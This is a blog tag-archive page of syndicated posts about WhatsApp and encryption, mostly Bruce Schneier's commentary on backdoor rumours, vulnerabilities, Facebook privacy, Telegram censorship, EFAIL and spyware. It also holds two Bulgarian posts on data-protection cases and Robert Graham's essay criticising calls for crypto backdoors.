Tag Archives: whatsapp

More on Backdooring (or Not) WhatsApp

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/08/more_on_backdoo.html

Yesterday, I blogged about a Facebook plan to backdoor WhatsApp by adding client-side scanning and filtering. It seems that I was wrong, and there are no such plans.

The only source for that post was a Forbes essay by Kalev Leetaru, which links to a previous Forbes essay by him, which links to a video presentation from a Facebook developers conference.

Leetaru extrapolated a lot out of very little. I watched the video (the relevant section is at the 23:00 mark), and it doesn’t talk about client-side scanning of messages. It doesn’t talk about messaging apps at all. It discusses using AI techniques to find bad content on Facebook, and the difficulties that arise from dynamic content:

So far, we have been keeping this fight [against bad actors and harmful content] on familiar grounds. And that is, we have been training our AI models on the server and making inferences on the server when all the data are flooding into our data centers.

While this works for most scenarios, it is not the ideal setup for some unique integrity challenges. URL masking is one such problem which is very hard to do. We have the traditional way of server-side inference. What is URL masking? Let us imagine that a user sees a link on the app and decides to click on it. When they click on it, Facebook actually logs the URL to crawl it at a later date. But…the publisher can dynamically change the content of the webpage to make it look more legitimate [to Facebook]. But then our users click on the same link, they see something completely different — oftentimes it is disturbing; oftentimes it violates our policy standards. Of course, this creates a bad experience for our community that we would like to avoid. This and similar integrity problems are best solved with AI on the device.

That might be true, but it also would hand whatever secret-AI sauce Facebook has to every one of its users to reverse engineer — which means it’s probably not going to happen. And it is a dumb idea, for reasons Steve Bellovin has pointed out.

Facebook’s first published response was a comment on the Hacker News website from a user named “wcathcart,” which Cardozo assures me is Will Cathcart, the vice president of WhatsApp. (I have no reason to doubt his identity, but surely there is a more official news channel that Facebook could have chosen to use if they wanted to.) Cathcart wrote:

We haven’t added a backdoor to WhatsApp. The Forbes contributor referred to a technical talk about client side AI in general to conclude that we might do client side scanning of content on WhatsApp for anti-abuse purposes.

To be crystal clear, we have not done this, have zero plans to do so, and if we ever did it would be quite obvious and detectable that we had done it. We understand the serious concerns this type of approach would raise which is why we are opposed to it.

Facebook’s second published response was a comment on my original blog post, which has been confirmed to me by the WhatsApp people as authentic. It’s more of the same.

So, this was a false alarm. And, to be fair, Alec Muffet called foul on the first Forbes piece:

So, here’s my pre-emptive finger wag: Civil Society’s pack mentality can make us our own worst enemies. If we go around repeating one man’s Germanic conspiracy theory, we may doom ourselves to precisely what we fear. Instead, we should ­ we must ­ take steps to constructively demand what we actually want: End to End Encryption which is worthy of the name.

Blame accepted. But in general, this is the sort of thing we need to watch for. End-to-end encryption only secures data in transit. The data has to be in the clear on the device where it is created, and it has to be in the clear on the device where it is consumed. Those are the obvious places for an eavesdropper to get a copy.

This has been a long process. Facebook desperately wanted to convince me to correct the record, while at the same time not wanting to write something on their own letterhead (just a couple of comments, so far). I spoke at length with Privacy Policy Manager Nate Cardozo, whom Facebook hired last December from EFF. (Back then, I remember thinking of him — and the two other new privacy hires — as basically human warrant canaries. If they ever leave Facebook under non-obvious circumstances, we know that things are bad.) He basically leveraged his historical reputation to assure me that WhatsApp, and Facebook in general, would never do something like this. I am trusting him, while also reminding everyone that Facebook has broken so many privacy promises that they really can’t be trusted.

Final note: If they want to be trusted, Adam Shostack and I gave them a road map.

Hacker News thread.

EDITED TO ADD (8/4): Slashdot covered my retraction.

Facebook Plans on Backdooring WhatsApp

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/08/facebook_plans_.html

This article points out that Facebook’s planned content moderation scheme will result in an encryption backdoor into WhatsApp:

In Facebook’s vision, the actual end-to-end encryption client itself such as WhatsApp will include embedded content moderation and blacklist filtering algorithms. These algorithms will be continually updated from a central cloud service, but will run locally on the user’s device, scanning each cleartext message before it is sent and each encrypted message after it is decrypted.

The company even noted that when it detects violations it will need to quietly stream a copy of the formerly encrypted content back to its central servers to analyze further, even if the user objects, acting as true wiretapping service.

Facebook’s model entirely bypasses the encryption debate by globalizing the current practice of compromising devices by building those encryption bypasses directly into the communications clients themselves and deploying what amounts to machine-based wiretaps to billions of users at once.

Once this is in place, it’s easy for the government to demand that Facebook add another filter — one that searches for communications that they care about — and alert them when it gets triggered.

Of course alternatives like Signal will exist for those who don’t want to be subject to Facebook’s content moderation, but what happens when this filtering technology is built into operating systems?

The problem is that if Facebook’s model succeeds, it will only be a matter of time before device manufacturers and mobile operating system developers embed similar tools directly into devices themselves, making them impossible to escape. Embedding content scanning tools directly into phones would make it possible to scan all apps, including ones like Signal, effectively ending the era of encrypted communications.

I don’t think this will happen — why does AT&T care about content moderation — but it is something to watch?

EDITED TO ADD (8/2): This story is wrong. Read my correction.

WhatsApp Vulnerability Fixed

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/05/whatsapp_vulner_1.html

WhatsApp fixed a devastating vulnerability that allowed someone to remotely hack a phone by initiating a WhatsApp voice call. The recipient didn’t even have to answer the call.

The Israeli cyber-arms manufacturer NSO Group is believed to be behind the exploit, but of course there is no definitive proof.

If you use WhatsApp, update your app immediately.

Judging Facebook’s Privacy Shift

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2019/03/judging_faceboo.html

Facebook is making a new and stronger commitment to privacy. Last month, the company hired three of its most vociferous critics and installed them in senior technical positions. And on Wednesday, Mark Zuckerberg wrote that the company will pivot to focus on private conversations over the public sharing that has long defined the platform, even while conceding that “frankly we don’t currently have a strong reputation for building privacy protective services.”

There is ample reason to question Zuckerberg’s pronouncement: The company has made — and broken — many privacy promises over the years. And if you read his 3,000-word post carefully, Zuckerberg says nothing about changing Facebook’s surveillance capitalism business model. All the post discusses is making private chats more central to the company, which seems to be a play for increased market dominance and to counter the Chinese company WeChat.

In security and privacy, the devil is always in the details — and Zuckerberg’s post provides none. But we’ll take him at his word and try to fill in some of the details here. What follows is a list of changes we should expect if Facebook is serious about changing its business model and improving user privacy.

How Facebook treats people on its platform

Increased transparency over advertiser and app accesses to user data. Today, Facebook users can download and view much of the data the company has about them. This is important, but it doesn’t go far enough. The company could be more transparent about what data it shares with advertisers and others and how it allows advertisers to select users they show ads to. Facebook could use its substantial skills in usability testing to help people understand the mechanisms advertisers use to show them ads or the reasoning behind what it chooses to show in user timelines. It could deliver on promises in this area.

Better — and more usable — privacy options. Facebook users have limited control over how their data is shared with other Facebook users and almost no control over how it is shared with Facebook’s advertisers, which are the company’s real customers. Moreover, the controls are buried deep behind complex and confusing menu options. To be fair, some of this is because privacy is complex, and it’s hard to understand the results of different options. But much of this is deliberate; Facebook doesn’t want its users to make their data private from other users.

The company could give people better control over how — and whether — their data is used, shared, and sold. For example, it could allow users to turn off individually targeted news and advertising. By this, we don’t mean simply making those advertisements invisible; we mean turning off the data flows into those tailoring systems. Finally, since most users stick to the default options when it comes to configuring their apps, a changing Facebook could tilt those defaults toward more privacy, requiring less tailoring most of the time.

More user protection from stalking. “Facebook stalking” is often thought of as “stalking light,” or “harmless.” But stalkers are rarely harmless. Facebook should acknowledge this class of misuse and work with experts to build tools that protect all of its users, especially its most vulnerable ones. Such tools should guide normal people away from creepiness and give victims power and flexibility to enlist aid from sources ranging from advocates to police.

Fully ending real-name enforcement. Facebook’s real-names policy, requiring people to use their actual legal names on the platform, hurts people such as activists, victims of intimate partner violence, police officers whose work makes them targets, and anyone with a public persona who wishes to have control over how they identify to the public. There are many ways Facebook can improve on this, from ending enforcement to allowing verifying pseudonyms for everyone­ — not just celebrities like Lady Gaga. Doing so would mark a clear shift.

How Facebook runs its platform

Increased transparency of Facebook’s business practices. One of the hard things about evaluating Facebook is the effort needed to get good information about its business practices. When violations are exposed by the media, as they regularly are, we are all surprised at the different ways Facebook violates user privacy. Most recently, the company used phone numbers provided for two-factor authentication for advertising and networking purposes. Facebook needs to be both explicit and detailed about how and when it shares user data. In fact, a move from discussing “sharing” to discussing “transfers,” “access to raw information,” and “access to derived information” would be a visible improvement.

Increased transparency regarding censorship rules. Facebook makes choices about what content is acceptable on its site. Those choices are controversial, implemented by thousands of low-paid workers quickly implementing unclear rules. These are tremendously hard problems without clear solutions. Even obvious rules like banning hateful words run into challenges when people try to legitimately discuss certain important topics. Whatever Facebook does in this regard, the company needs be more transparent about its processes. It should allow regulators and the public to audit the company’s practices. Moreover, Facebook should share any innovative engineering solutions with the world, much as it currently shares its data center engineering.

Better security for collected user data. There have been numerous examples of attackers targeting cloud service platforms to gain access to user data. Facebook has a large and skilled product security team that says some of the right things. That team needs to be involved in the design trade-offs for features and not just review the near-final designs for flaws. Shutting down a feature based on internal security analysis would be a clear message.

Better data security so Facebook sees less. Facebook eavesdrops on almost every aspect of its users’ lives. On the other hand, WhatsApp — purchased by Facebook in 2014 — provides users with end-to-end encrypted messaging. While Facebook knows who is messaging whom and how often, Facebook has no way of learning the contents of those messages. Recently, Facebook announced plans to combine WhatsApp, Facebook Messenger, and Instagram, extending WhatsApp’s security to the consolidated system. Changing course here would be a dramatic and negative signal.

Collecting less data from outside of Facebook. Facebook doesn’t just collect data about you when you’re on the platform. Because its “like” button is on so many other pages, the company can collect data about you when you’re not on Facebook. It even collects what it calls “shadow profiles” — data about you even if you’re not a Facebook user. This data is combined with other surveillance data the company buys, including health and financial data. Collecting and saving less of this data would be a strong indicator of a new direction for the company.

Better use of Facebook data to prevent violence. There is a trade-off between Facebook seeing less and Facebook doing more to prevent hateful and inflammatory speech. Dozens of people have been killed by mob violence because of fake news spread on WhatsApp. If Facebook were doing a convincing job of controlling fake news without end-to-end encryption, then we would expect to hear how it could use patterns in metadata to handle encrypted fake news.

How Facebook manages for privacy

Create a team measured on privacy and trust. Where companies spend their money tells you what matters to them. Facebook has a large and important growth team, but what team, if any, is responsible for privacy, not as a matter of compliance or pushing the rules, but for engineering? Transparency in how it is staffed relative to other teams would be telling.

Hire a senior executive responsible for trust. Facebook’s current team has been focused on growth and revenue. Its one chief security officer, Alex Stamos, was not replaced when he left in 2018, which may indicate that having an advocate for security on the leadership team led to debate and disagreement. Retaining a voice for security and privacy issues at the executive level, before those issues affected users, was a good thing. Now that responsibility is diffuse. It’s unclear how Facebook measures and assesses its own progress and who might be held accountable for failings. Facebook can begin the process of fixing this by designating a senior executive who is responsible for trust.

Engage with regulators. Much of Facebook’s posturing seems to be an attempt to forestall regulation. Facebook sends lobbyists to Washington and other capitals, and until recently the company sent support staff to politician’s offices. It has secret lobbying campaigns against privacy laws. And Facebook has repeatedly violated a 2011 Federal Trade Commission consent order regarding user privacy. Regulating big technical projects is not easy. Most of the people who understand how these systems work understand them because they build them. Societies will regulate Facebook, and the quality of that regulation requires real education of legislators and their staffs. While businesses often want to avoid regulation, any focus on privacy will require strong government oversight. If Facebook is serious about privacy being a real interest, it will accept both government regulation and community input.

User privacy is traditionally against Facebook’s core business interests. Advertising is its business model, and targeted ads sell better and more profitably — and that requires users to engage with the platform as much as possible. Increased pressure on Facebook to manage propaganda and hate speech could easily lead to more surveillance. But there is pressure in the other direction as well, as users equate privacy with increased control over how they present themselves on the platform.

We don’t expect Facebook to abandon its advertising business model, relent in its push for monopolistic dominance, or fundamentally alter its social networking platforms. But the company can give users important privacy protections and controls without abandoning surveillance capitalism. While some of these changes will reduce profits in the short term, we hope Facebook’s leadership realizes that they are in the best long-term interest of the company.

Facebook talks about community and bringing people together. These are admirable goals, and there’s plenty of value (and profit) in having a sustainable platform for connecting people. But as long as the most important measure of success is short-term profit, doing things that help strengthen communities will fall by the wayside. Surveillance, which allows individually targeted advertising, will be prioritized over user privacy. Outrage, which drives engagement, will be prioritized over feelings of belonging. And corporate secrecy, which allows Facebook to evade both regulators and its users, will be prioritized over societal oversight. If Facebook now truly believes that these latter options are critical to its long-term success as a company, we welcome the changes that are forthcoming.

This essay was co-authored with Adam Shostack, and originally appeared on Medium OneZero. We wrote a similar essay in 2002 about judging Microsoft’s then newfound commitment to security.

Russian Censorship of Telegram

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/06/russian_censors.html

Internet censors have a new strategy in their bid to block applications and websites: pressuring the large cloud providers that host them. These providers have concerns that are much broader than the targets of censorship efforts, so they have the choice of either standing up to the censors or capitulating in order to maximize their business. Today’s Internet largely reflects the dominance of a handful of companies behind the cloud services, search engines and mobile platforms that underpin the technology landscape. This new centralization radically tips the balance between those who want to censor parts of the Internet and those trying to evade censorship. When the profitable answer is for a software giant to acquiesce to censors’ demands, how long can Internet freedom last?

The recent battle between the Russian government and the Telegram messaging app illustrates one way this might play out. Russia has been trying to block Telegram since April, when a Moscow court banned it after the company refused to give Russian authorities access to user messages. Telegram, which is widely used in Russia, works on both iPhone and Android, and there are Windows and Mac desktop versions available. The app offers optional end-to-end encryption, meaning that all messages are encrypted on the sender’s phone and decrypted on the receiver’s phone; no part of the network can eavesdrop on the messages.

Since then, Telegram has been playing cat-and-mouse with the Russian telecom regulator Roskomnadzor by varying the IP address the app uses to communicate. Because Telegram isn’t a fixed website, it doesn’t need a fixed IP address. Telegram bought tens of thousands of IP addresses and has been quickly rotating through them, staying a step ahead of censors. Cleverly, this tactic is invisible to users. The app never sees the change, or the entire list of IP addresses, and the censor has no clear way to block them all.

A week after the court ban, Roskomnadzor countered with an unprecedented move of its own: blocking 19 million IP addresses, many on Amazon Web Services and Google Cloud. The collateral damage was widespread: The action inadvertently broke many other web services that use those platforms, and Roskomnadzor scaled back after it became clear that its action had affected services critical for Russian business. Even so, the censor is still blocking millions of IP addresses.

More recently, Russia has been pressuring Apple not to offer the Telegram app in its iPhone App Store. As of this writing, Apple has not complied, and the company has allowed Telegram to download a critical software update to iPhone users (after what the app’s founder called a delay last month). Roskomnadzor could further pressure Apple, though, including by threatening to turn off its entire iPhone app business in Russia.

Telegram might seem a weird app for Russia to focus on. Those of us who work in security don’t recommend the program, primarily because of the nature of its cryptographic protocols. In general, proprietary cryptography has numerous fatal security flaws. We generally recommend Signal for secure SMS messaging, or, if having that program on your computer is somehow incriminating, WhatsApp. (More than 1.5 billion people worldwide use WhatsApp.) What Telegram has going for it is that it works really well on lousy networks. That’s why it is so popular in places like Iran and Afghanistan. (Iran is also trying to ban the app.)

What the Russian government doesn’t like about Telegram is its anonymous broadcast feature­ — channel capability and chats — ­which makes it an effective platform for political debate and citizen journalism. The Russians might not like that Telegram is encrypted, but odds are good that they can simply break the encryption. Telegram’s role in facilitating uncontrolled journalism is the real issue.

Iran attempts to block Telegram have been more successful than Russia’s, less because Iran’s censorship technology is more sophisticated but because Telegram is not willing to go as far to defend Iranian users. The reasons are not rooted in business decisions. Simply put, Telegram is a Russian product and the designers are more motivated to poke Russia in the eye. Pavel Durov, Telegram’s founder, has pledged millions of dollars to help fight Russian censorship.

For the moment, Russia has lost. But this battle is far from over. Russia could easily come back with more targeted pressure on Google, Amazon and Apple. A year earlier, Zello used the same trick Telegram is using to evade Russian censors. Then, Roskomnadzor threatened to block all of Amazon Web Services and Google Cloud; and in that instance, both companies forced Zello to stop its IP-hopping censorship-evasion tactic.

Russia could also further develop its censorship infrastructure. If its capabilities were as finely honed as China’s, it would be able to more effectively block Telegram from operating. Right now, Russia can block only specific IP addresses, which is too coarse a tool for this issue. Telegram’s voice capabilities in Russia are significantly degraded, however, probably because high-capacity IP addresses are easier to block.

Whatever its current frustrations, Russia might well win in the long term. By demonstrating its willingness to suffer the temporary collateral damage of blocking major cloud providers, it prompted cloud providers to block another and more effective anti-censorship tactic, or at least accelerated the process. In April, Google and Amazon banned­ — and technically blocked­ — the practice of “domain fronting,” a trick anti-censorship tools use to get around Internet censors by pretending to be other kinds of traffic. Developers would use popular websites as a proxy, routing traffic to their own servers through another website­ — in this case Google.com­ — to fool censors into believing the traffic was intended for Google.com. The anonymous web-browsing tool Tor has used domain fronting since 2014. Signal, since 2016. Eliminating the capability is a boon to censors worldwide.

Tech giants have gotten embroiled in censorship battles for years. Sometimes they fight and sometimes they fold, but until now there have always been options. What this particular fight highlights is that Internet freedom is increasingly in the hands of the world’s largest Internet companies. And while freedom may have its advocates — ­the American Civil Liberties Union has tweeted its support for those companies, and some 12,000 people in Moscow protested against the Telegram ban­ — actions such as disallowing domain fronting illustrate that getting the big tech companies to sacrifice their near-term commercial interests will be an uphill battle. Apple has already removed anti-censorship apps from its Chinese app store.

In 1993, John Gilmore famously said that “The Internet interprets censorship as damage and routes around it.” That was technically true when he said it but only because the routing structure of the Internet was so distributed. As centralization increases, the Internet loses that robustness, and censorship by governments and companies becomes easier.

This essay previously appeared on Lawfare.com.

Шремс подава оплаквания срещу Google, Facebook, Instagram и WhatsApp

Post Syndicated from nellyo original https://nellyo.wordpress.com/2018/05/27/gdpr-schrems/

Макс Шремс подава оплаквания срещу Google, Facebook, Instagram и WhatsApp. Причината е, че според него е незаконен изборът, пред който са изправени потребителите им – да приемат условията на компаниите или да загубят достъп до услугите им.

Подходът “съгласи се или напусни”, казва Шремс пред Reuters Television, нарушава правото на хората съгласно Общия регламент за защита на данните (GDPR) да избират свободно дали да позволят на компаниите да използват данните им. Трябва да има  избор,  смята Шремс.

Шремс е австриецът, който все не е доволен от защитата на личните данни в социалните мрежи и не ги оставя на мира, като превръща борбата си за защита на данните и в професия, юрист е. Този път действа чрез създадена от него неправителствена организация noyb

Independent.ie 

The Guardian

Details on a New PGP Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/05/details_on_a_ne.html

A new PGP vulnerability was announced today. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.

A few initial comments:

1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don’t mean to minimize the seriousness of this attack, but that is a consideration.

2. The vulnerability isn’t with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: “No decryption in the e-mail client,” and “disable HTML rendering.”

3. I’ve been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it’s not bug free.

3. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today’s announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.

I’ll post other commentaries and analyses as I find them.

EDITED TO ADD (5/14): News articles.

Slashdot thread.

Russia is Banning Telegram

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/04/russia_is_banni.html

Russia has banned the secure messaging app Telegram. It’s making an absolute mess of the ban — blocking 16 million IP addresses, many belonging to the Amazon and Google clouds — and it’s not even clear that it’s working. But, more importantly, I’m not convinced Telegram is secure in the first place.

Such a weird story. If you want secure messaging, use Signal. If you’re concerned that having Signal on your phone will itself arouse suspicion, use WhatsApp.

WhatsApp Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/01/whatsapp_vulner.html

A new vulnerability in WhatsApp has been discovered:

…the researchers unearthed far more significant gaps in WhatsApp’s security: They say that anyone who controls WhatsApp’s servers could effortlessly insert new people into an otherwise private group, even without the permission of the administrator who ostensibly controls access to that conversation.

Matthew Green has a good description:

If all you want is the TL;DR, here’s the headline finding: due to flaws in both Signal and WhatsApp (which I single out because I use them), it’s theoretically possible for strangers to add themselves to an encrypted group chat. However, the caveat is that these attacks are extremely difficult to pull off in practice, so nobody needs to panic. But both issues are very avoidable, and tend to undermine the logic of having an end-to-end encryption protocol in the first place.

Here’s the research paper.

Dark Caracal: Global Espionage Malware from Lebanon

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2018/01/dark_caracal_gl.html

The EFF and Lookout are reporting on a new piece of spyware operating out of Lebanon. It primarily targets mobile devices compromised by fake secure messaging clients like Signal and WhatsApp.

From the Lookout announcement:

Dark Caracal has operated a series of multi-platform campaigns starting from at least January 2012, according to our research. The campaigns span across 21+ countries and thousands of victims. Types of data stolen include documents, call records, audio recordings, secure messaging client content, contact information, text messages, photos, and account data. We believe this actor is operating their campaigns from a building belonging to the Lebanese General Security Directorate (GDGS) in Beirut.

It looks like a complex infrastructure that’s been well-developed, and continually upgraded and maintained. It appears that a cyberweapons arms manufacturer is selling this tool to different countries. From the full report:

Dark Caracal is using the same infrastructure as was previously seen in the Operation Manul campaign, which targeted journalists, lawyers, and dissidents critical of the government of Kazakhstan.

There’s a lot in the full report. It’s worth reading.

Three news articles.

Германия: нарушава ли Facebook конкурентното право

Post Syndicated from nellyo original https://nellyo.wordpress.com/2017/12/22/facebook-9/

Конкурентният регулатор Bundeskartellamt е уведомил писмено дружеството Facebook за предварителната си правна оценка в процедура за злоупотреба с господстващо положение, която органът провежда срещу Facebook. На настоящия етап от производството органът приема, че Facebook има господстващо положение на германския пазар за социални мрежи. Органът смята, че Facebook злоупотребява с това господстващо положение и събира неограничен брой данни, вкл. чрез сайтове на трети страни  – или собственост на Facebook, като например WhatsApp или Instagram – или  сайтове и приложения на други оператори с вградени приложни програмни интерфейси (API) във Facebook.Участието във Facebook е под условие  – неограничено одобрение на Общите условия. На потребителите се дава възможност да приемат  целия пакет  или да  откажат ползването на социалната мрежа. Представител на конкурентния регулатор казва, че потребителите не винаги са дали своето ефективно съгласие за проследяването на данните   и обединяването на данните в съответния Facebook профил.

Bundeskartellamt по-специално се фокусира върху събирането и използването на потребителски данни от  трети страни.  Потребителите не могат да очакват данни, които се генерират, когато използват услуги, различни от Facebook, да бъдат добавени към техния профил във Facebook в тази степен – но в действителност данни  се предават от уебсайтове и приложения към Facebook.  Според конкурентния регулатор потребителите трябва да имат повече контрол над тези процеси и Facebook трябва да им предостави подходящи възможности за ефективно ограничаване на подобно  събиране на данни.

Производство има и във Франция, но то се осъществява от регулатора за защита на данните по повод обмена на данни между WhatsApp и Facebook.

Filed under: Digital, EU Law Tagged: dp, FB

Daphne Caruana Galizia’s Murder and the Security of WhatsApp

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2017/11/daphne_caruana_.html

Daphne Caruana Galizia was a Maltese journalist whose anti-corruption investigations exposed powerful people. She was murdered in October by a car bomb.

Galizia used WhatsApp to communicate securely with her sources. Now that she is dead, the Maltese police want to break into her phone or the app, and find out who those sources were.

One journalist reports:

Part of Daphne’s destroyed smart phone was elevated from the scene.

Investigators say that Caruana Galizia had not taken her laptop with her on that particular trip. If she had done so, the forensic experts would have found evidence on the ground.

Her mobile phone is also being examined, as can be seen from her WhatsApp profile, which has registered activity since the murder. But it is understood that the data is safe.

Sources close to the newsroom said that as part of the investigation her sim card has been cloned. This is done with the help of mobile service providers in similar cases. Asked if her WhatsApp messages or any other messages that were stored in her phone will be retrieved, the source said that since the messaging application is encrypted, the messages cannot be seen. Therefore it is unlikely that any data can be retrieved.

I am less optimistic than that reporter. The FBI is providing “specific assistance.” The article doesn’t explain that, but I would not be surprised if they were helping crack the phone.

It will be interesting to see if WhatsApp’s security survives this. My guess is that it depends on how much of the phone was recovered from the bombed car.

EDITED TO ADD (11/7): The court-appointed IT expert on the case has a criminal record in the UK for theft and forgery.

"Responsible encryption" fallacies

Post Syndicated from Robert Graham original http://blog.erratasec.com/2017/10/responsible-encryption-fallacies.html

Deputy Attorney General Rod Rosenstein gave a speech recently calling for “Responsible Encryption” (aka. “Crypto Backdoors”). It’s full of dangerous ideas that need to be debunked.

The importance of law enforcement

The first third of the speech talks about the importance of law enforcement, as if it’s the only thing standing between us and chaos. It cites the 2016 Mirai attacks as an example of the chaos that will only get worse without stricter law enforcement.

But the Mira case demonstrated the opposite, how law enforcement is not needed. They made no arrests in the case. A year later, they still haven’t a clue who did it.

Conversely, we technologists have fixed the major infrastructure issues. Specifically, those affected by the DNS outage have moved to multiple DNS providers, including a high-capacity DNS provider like Google and Amazon who can handle such large attacks easily.

In other words, we the people fixed the major Mirai problem, and law-enforcement didn’t.

Moreover, instead being a solution to cyber threats, law enforcement has become a threat itself. The DNC didn’t have the FBI investigate the attacks from Russia likely because they didn’t want the FBI reading all their files, finding wrongdoing by the DNC. It’s not that they did anything actually wrong, but it’s more like that famous quote from Richelieu “Give me six words written by the most honest of men and I’ll find something to hang him by”. Give all your internal emails over to the FBI and I’m certain they’ll find something to hang you by, if they want.
Or consider the case of Andrew Auernheimer. He found AT&T’s website made public user accounts of the first iPad, so he copied some down and posted them to a news site. AT&T had denied the problem, so making the problem public was the only way to force them to fix it. Such access to the website was legal, because AT&T had made the data public. However, prosecutors disagreed. In order to protect the powerful, they twisted and perverted the law to put Auernheimer in jail.

It’s not that law enforcement is bad, it’s that it’s not the unalloyed good Rosenstein imagines. When law enforcement becomes the thing Rosenstein describes, it means we live in a police state.

Where law enforcement can’t go

Rosenstein repeats the frequent claim in the encryption debate:

Our society has never had a system where evidence of criminal wrongdoing was totally impervious to detection

Of course our society has places “impervious to detection”, protected by both legal and natural barriers.

An example of a legal barrier is how spouses can’t be forced to testify against each other. This barrier is impervious.

A better example, though, is how so much of government, intelligence, the military, and law enforcement itself is impervious. If prosecutors could gather evidence everywhere, then why isn’t Rosenstein prosecuting those guilty of CIA torture?

Oh, you say, government is a special exception. If that were the case, then why did Rosenstein dedicate a precious third of his speech discussing the “rule of law” and how it applies to everyone, “protecting people from abuse by the government”. It obviously doesn’t, there’s one rule of government and a different rule for the people, and the rule for government means there’s lots of places law enforcement can’t go to gather evidence.

Likewise, the crypto backdoor Rosenstein is demanding for citizens doesn’t apply to the President, Congress, the NSA, the Army, or Rosenstein himself.

Then there are the natural barriers. The police can’t read your mind. They can only get the evidence that is there, like partial fingerprints, which are far less reliable than full fingerprints. They can’t go backwards in time.

I mention this because encryption is a natural barrier. It’s their job to overcome this barrier if they can, to crack crypto and so forth. It’s not our job to do it for them.

It’s like the camera that increasingly comes with TVs for video conferencing, or the microphone on Alexa-style devices that are always recording. This suddenly creates evidence that the police want our help in gathering, such as having the camera turned on all the time, recording to disk, in case the police later gets a warrant, to peer backward in time what happened in our living rooms. The “nothing is impervious” argument applies here as well. And it’s equally bogus here. By not helping police by not recording our activities, we aren’t somehow breaking some long standing tradit

And this is the scary part. It’s not that we are breaking some ancient tradition that there’s no place the police can’t go (with a warrant). Instead, crypto backdoors breaking the tradition that never before have I been forced to help them eavesdrop on me, even before I’m a suspect, even before any crime has been committed. Sure, laws like CALEA force the phone companies to help the police against wrongdoers — but here Rosenstein is insisting I help the police against myself.

Balance between privacy and public safety

Rosenstein repeats the frequent claim that encryption upsets the balance between privacy/safety:

Warrant-proof encryption defeats the constitutional balance by elevating privacy above public safety.

This is laughable, because technology has swung the balance alarmingly in favor of law enforcement. Far from “Going Dark” as his side claims, the problem we are confronted with is “Going Light”, where the police state monitors our every action.

You are surrounded by recording devices. If you walk down the street in town, outdoor surveillance cameras feed police facial recognition systems. If you drive, automated license plate readers can track your route. If you make a phone call or use a credit card, the police get a record of the transaction. If you stay in a hotel, they demand your ID, for law enforcement purposes.

And that’s their stuff, which is nothing compared to your stuff. You are never far from a recording device you own, such as your mobile phone, TV, Alexa/Siri/OkGoogle device, laptop. Modern cars from the last few years increasingly have always-on cell connections and data recorders that record your every action (and location).

Even if you hike out into the country, when you get back, the FBI can subpoena your GPS device to track down your hidden weapon’s cache, or grab the photos from your camera.

And this is all offline. So much of what we do is now online. Of the photographs you own, fewer than 1% are printed out, the rest are on your computer or backed up to the cloud.

Your phone is also a GPS recorder of your exact position all the time, which if the government wins the Carpenter case, they police can grab without a warrant. Tagging all citizens with a recording device of their position is not “balance” but the premise for a novel more dystopic than 1984.

If suspected of a crime, which would you rather the police searched? Your person, houses, papers, and physical effects? Or your mobile phone, computer, email, and online/cloud accounts?

The balance of privacy and safety has swung so far in favor of law enforcement that rather than debating whether they should have crypto backdoors, we should be debating how to add more privacy protections.

“But it’s not conclusive”

Rosenstein defends the “going light” (“Golden Age of Surveillance”) by pointing out it’s not always enough for conviction. Nothing gives a conviction better than a person’s own words admitting to the crime that were captured by surveillance. This other data, while copious, often fails to convince a jury beyond a reasonable doubt.
This is nonsense. Police got along well enough before the digital age, before such widespread messaging. They solved terrorist and child abduction cases just fine in the 1980s. Sure, somebody’s GPS location isn’t by itself enough — until you go there and find all the buried bodies, which leads to a conviction. “Going dark” imagines that somehow, the evidence they’ve been gathering for centuries is going away. It isn’t. It’s still here, and matches up with even more digital evidence.
Conversely, a person’s own words are not as conclusive as you think. There’s always missing context. We quickly get back to the Richelieu “six words” problem, where captured communications are twisted to convict people, with defense lawyers trying to untwist them.

Rosenstein’s claim may be true, that a lot of criminals will go free because the other electronic data isn’t convincing enough. But I’d need to see that claim backed up with hard studies, not thrown out for emotional impact.

Terrorists and child molesters

You can always tell the lack of seriousness of law enforcement when they bring up terrorists and child molesters.
To be fair, sometimes we do need to talk about terrorists. There are things unique to terrorism where me may need to give government explicit powers to address those unique concerns. For example, the NSA buys mobile phone 0day exploits in order to hack terrorist leaders in tribal areas. This is a good thing.
But when terrorists use encryption the same way everyone else does, then it’s not a unique reason to sacrifice our freedoms to give the police extra powers. Either it’s a good idea for all crimes or no crimes — there’s nothing particular about terrorism that makes it an exceptional crime. Dead people are dead. Any rational view of the problem relegates terrorism to be a minor problem. More citizens have died since September 8, 2001 from their own furniture than from terrorism. According to studies, the hot water from the tap is more of a threat to you than terrorists.
